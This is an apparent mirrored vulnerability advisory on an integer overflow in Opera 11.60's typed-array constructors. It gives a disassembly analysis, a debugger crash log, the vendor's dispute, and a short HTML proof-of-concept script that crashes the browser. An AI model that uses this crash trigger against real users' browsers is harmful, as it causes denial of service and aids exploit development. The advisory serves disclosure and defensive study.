Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27619
HistoryFeb 08, 2012 - 12:00 a.m.

[CAL-2012-0004] opera array integer overflow

2012-02-0800:00:00
vulners.com
17

CAL-2012-0004 opera array integer overflow

1 Affected Products

11.60 and prior

2 Vulnerability Details

Code Audit Labs http://www.vulnhunt.com has discovered a integer
overflow vulnerability in array functions like
Int32Array,Int16Array… .

Opear vendor say "We have reproduced the problem, and determined that it
does not have any security implications, since the crash is a caused by
a memory fill operation which the webpage have no control over, and this
operation will always crash. It is therefore classified as a stability
issue, not a security issue. "

we still insist on that it is a security issue or not should accord to
root cause of this bug instead of is it exploitable or not. because you
think it is unexploitable, someone can exploit it via deeply research.

So if most people of Security Community think this is a security issue,
please assign to a CVE number.

3 Analysis

Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x2 >2
2:x
2!=00
3: (x*2-1)+0x1f overflow 32bits.

so the length of malloc is (x2-1)+0x1f
memset(eax+0x10,0,x
2) cause memory corrupt

text:5C769F57
text:5C769F57 loc_5C769F57: ; CODE XREF:
sub_5C769DCE+17Cj
text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2
text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is
80000001
text:5C769F60 cmp eax, [esp+48h+var_3C]
text:5C769F64 jb short loc_5C769F37
text:5C769F66 mov [esp+48h+size], eax
text:5C769F6A mov eax, [ebp+arg_0]
text:5C769F6D call sub_5C14A6E8
text:5C769F72 push [esp+48h+size] ; size
text:5C769F76 push dword ptr [eax] ; int
text:5C769F78 push [ebp+arg_0] ; int
text:5C769F7B call sub_5C765B6D
text:5C769F80 add esp, 0Ch

…

text:5C46A598
text:5C46A598 arg_0 = dword ptr 4
text:5C46A598 size = dword ptr 8
text:5C46A598
text:5C46A598 mov edx, [esp+arg_0]
text:5C46A59C push esi
text:5C46A59D mov esi, [esp+4+size]
text:5C46A5A1 test esi, esi
text:5C46A5A3 jz short loc_5C46A5AA
text:5C46A5A5 lea eax, [esi-1]
text:5C46A5A8 jmp short loc_5C46A5AC
text:5C46A5AA ;

text:5C46A5AA
text:5C46A5AA loc_5C46A5AA: ; CODE XREF:
sub_5C46A598+Bj
text:5C46A5AA xor eax, eax
text:5C46A5AC
text:5C46A5AC loc_5C46A5AC: ; CODE XREF:
sub_5C46A598+10j
text:5C46A5AC mov ecx, [edx+8]
text:5C46A5AF add eax, 1Fh
text:5C46A5B2 push 0
text:5C46A5B4 and eax, 0FFFFFFF8h
text:5C46A5B7 push eax
text:5C46A5B8 push edx
text:5C46A5B9 call sub_5C019DA0

ext:5C765BF7 loc_5C765BF7: ; CODE XREF:
sub_5C765B6D+50j
text:5C765BF7 push [ebp+size] ; size
text:5C765BFA lea eax, [ebx+10h]
text:5C765BFD push 0 ; c
text:5C765BFF push eax ; dst
text:5C765C00 call memset

4 Exploitable?

who known?

5 Crash info:

(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na
pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010207
*** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0
ds:0023:03680000=???
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be
wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c

6 POC:

open a html with following content

<script>
//???crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>

7 About Code Audit Labs:

Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com